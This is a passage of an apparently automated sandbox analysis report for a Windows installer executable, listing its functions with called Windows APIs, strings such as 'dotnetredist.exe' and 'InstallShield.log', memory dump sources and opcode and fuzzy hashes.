                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: dotnetredist.exe
                                                                                                                                                                          • API String ID: 2427045233-357393476
                                                                                                                                                                          • Opcode ID: 3bae74bd5d8747bfd19528874643b0385b12ddf3625a7cf6195b3574e04f4ff3
                                                                                                                                                                          • Instruction ID: a9fa4d29bb9215ae682cb0864f97f52842e2aa86c56cf576f34e6176f9bc8ebd
                                                                                                                                                                          • Opcode Fuzzy Hash: 3bae74bd5d8747bfd19528874643b0385b12ddf3625a7cf6195b3574e04f4ff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D317571A00128EADF60EA65CC4ABDDB3B8AB14304F5041EBE509E7191DB785F85CFA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041D3A3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041D3AA
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • VarBstrFromDate.OLEAUT32(?,?,00000400,00000000,00000000), ref: 0041D40D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastString$AllocBstrDateFromH_prolog3H_prolog3_
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3632267099-1835203436
                                                                                                                                                                          • Opcode ID: da6db32baf8bffd299d9057f758dcd171bb0e2145d1aad492c2902c25f5ca124
                                                                                                                                                                          • Instruction ID: 682dfbbbe63d348bfd12140f8f8565dea6e66f64daba4da75cae74783a1395e2
                                                                                                                                                                          • Opcode Fuzzy Hash: da6db32baf8bffd299d9057f758dcd171bb0e2145d1aad492c2902c25f5ca124
                                                                                                                                                                          • Instruction Fuzzy Hash: 062185B0904248EADB14EBE4CD56BEDBB78BF04308F24815EF5417B1D2DB785A09CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045B99B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045B9A5
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00457F57: __EH_prolog3.LIBCMT ref: 00457F5E
                                                                                                                                                                            • Part of subcall function 00433743: __EH_prolog3.LIBCMT ref: 0043374A
                                                                                                                                                                            • Part of subcall function 00438C80: __EH_prolog3.LIBCMT ref: 00438C87
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 00459590: __EH_prolog3.LIBCMT ref: 00459597
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 599163064-815662401
                                                                                                                                                                          • Opcode ID: 7900b2f3c44d9a50893f085134cd952a095870598c88f7e48f5999ffe81f11e7
                                                                                                                                                                          • Instruction ID: b66e6eb652501fde5ef97e9546fa6bdaa98ce18f85f6beb4e2916a2fbf0415f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 7900b2f3c44d9a50893f085134cd952a095870598c88f7e48f5999ffe81f11e7
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E217871500208EADB14EFA5C892BDDBB34AF14308F50809EFC4967282EB785E4DCBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045AF57, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045AF5E
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3H_prolog3_
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2488494826-815662401
                                                                                                                                                                          • Opcode ID: 91f9acb14bbc88083d9ec01aeb19ff17527e943527520dbc03ac33137a6cabfd
                                                                                                                                                                          • Instruction ID: 7dca5dd7c5ea23cc7909579e79415732674148576325e248753e219386d487c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 91f9acb14bbc88083d9ec01aeb19ff17527e943527520dbc03ac33137a6cabfd
                                                                                                                                                                          • Instruction Fuzzy Hash: 91218671900208DFDF04EFA4C986ADD7BB4BF04348F55805AFD08AB292D775AE4ACB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416ABA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004168CC: GetVersionExW.KERNEL32(?), ref: 004168F9
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00000000,00000000,00000007,00000000,00000007,?,00000000,00000007,00000000,00000000,?,00416A52,00000000,00000000,00000000), ref: 00416AE8
                                                                                                                                                                          • CompareStringA.KERNEL32(00000400,00000001,00000000,00000007,00000000,00000007,?,00000000,00000000,00000007,?,00000000,00000007,00000000,00000000), ref: 00416B4C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareString$Version
                                                                                                                                                                          • String ID: SeA
                                                                                                                                                                          • API String ID: 1887513360-2297079583
                                                                                                                                                                          • Opcode ID: 8619edf4bd999b80f015f66a18276808b5de525ff728136560a20b48f6ce2c3a
                                                                                                                                                                          • Instruction ID: 7d13bfa394f1b52c8684e5c5a8d7d88cc37516ea3694a82fa2bb7f145fd3ea30
                                                                                                                                                                          • Opcode Fuzzy Hash: 8619edf4bd999b80f015f66a18276808b5de525ff728136560a20b48f6ce2c3a
                                                                                                                                                                          • Instruction Fuzzy Hash: 52115E71601219BBDF10AF9ACC49DEF3F69EB49754F02406EFA0597111C739DA80CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00435444, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0043544B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastString$AllocH_prolog3H_prolog3_catch_
                                                                                                                                                                          • String ID: HsG$InstallLocation
                                                                                                                                                                          • API String ID: 1031041185-4197755029
                                                                                                                                                                          • Opcode ID: dbc558d167538eedbfb61af386787a869c6c43df5ed2ce558000a036966c532a
                                                                                                                                                                          • Instruction ID: 6e7ae36c447359ecb92ae8b16e60ea97403399de0b659f41d7374e5f47795f31
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc558d167538eedbfb61af386787a869c6c43df5ed2ce558000a036966c532a
                                                                                                                                                                          • Instruction Fuzzy Hash: E6216071900248EFDB00EF95C956BDDBBB4AF50308F50806EE505BB291DBB86B49CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415E3F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415E46
                                                                                                                                                                            • Part of subcall function 00416035: __EH_prolog3.LIBCMT ref: 0041603C
                                                                                                                                                                            • Part of subcall function 00416035: GetDesktopWindow.USER32 ref: 00416094
                                                                                                                                                                            • Part of subcall function 00416035: QueryPerformanceFrequency.KERNEL32(?), ref: 004160E7
                                                                                                                                                                          • InterlockedIncrement.KERNEL32(004A679C), ref: 00415EDA
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$DesktopFrequencyIncrementInterlockedPerformanceQueryWindow_malloc
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1224106807-1835203436
                                                                                                                                                                          • Opcode ID: a4df8b5bcc53976d14e97a3133f74eeee8bd8fab721be5fb50e6e6ec200ad65a
                                                                                                                                                                          • Instruction ID: 591bce0f7adf83ceaf518c9c98e830e460f0fee24d52db4242b26eaea9a9f517
                                                                                                                                                                          • Opcode Fuzzy Hash: a4df8b5bcc53976d14e97a3133f74eeee8bd8fab721be5fb50e6e6ec200ad65a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5521DE31A00209EFCF11EF6588017EE7BA2BF54304F14882FF85A97291DB799A91DB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F50C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: $jG$utils.cpp
                                                                                                                                                                          • API String ID: 2427045233-1058122760
                                                                                                                                                                          • Opcode ID: 1b252c4876b98e93e6491a2bc10c2e66d9c0163ab54f60273d54e2893db596fd
                                                                                                                                                                          • Instruction ID: e1f625e4652ae6d88715f3bdff6eaef8a636ec8663690f1da959191662dea6f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b252c4876b98e93e6491a2bc10c2e66d9c0163ab54f60273d54e2893db596fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 38215E30901258AEEF14EB64CD55BDD7B74BB11304F5041AEE082B70E2EBB85B49CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045D155, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Event
                                                                                                                                                                          • String ID: d
                                                                                                                                                                          • API String ID: 4201588131-2564639436
                                                                                                                                                                          • Opcode ID: b1027aeccd117d32aa2ff16aa134f56be8ed29ecfd65955d70da1c325ddbd005
                                                                                                                                                                          • Instruction ID: e26d5debe15793e31a0a20499a417c2b8b1c1982576e8c2ae86a074cae99f883
                                                                                                                                                                          • Opcode Fuzzy Hash: b1027aeccd117d32aa2ff16aa134f56be8ed29ecfd65955d70da1c325ddbd005
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F213571500A08EFCB24DF14D848A66B7B0FF08316F10896EE9578B662C736E84ACB55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045F352, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045F359
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 0045A984: __EH_prolog3_GS.LIBCMT ref: 0045A98E
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String$H_prolog3
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 386487564-815662401
                                                                                                                                                                          • Opcode ID: 8c55f0fe7c100a8d098827e3db406e6121508015b7b3e351e374acb5b0ce8d5c
                                                                                                                                                                          • Instruction ID: 33f1ce1c25dbc6274a5f19b94aaf64c07d39e3b5473e606eaeec8e3b6df12673
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c55f0fe7c100a8d098827e3db406e6121508015b7b3e351e374acb5b0ce8d5c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B117271500218DBDB01EFA1C992AED77B4BF44348F50412FFD05A7282DB78590EC79A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00435380, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043538A
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
                                                                                                                                                                            • Part of subcall function 004358EC: __EH_prolog3_catch.LIBCMT ref: 004358F3
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String$H_prolog3_catch
                                                                                                                                                                          • String ID: HsG$ProductLanguage
                                                                                                                                                                          • API String ID: 2885938503-3569323002
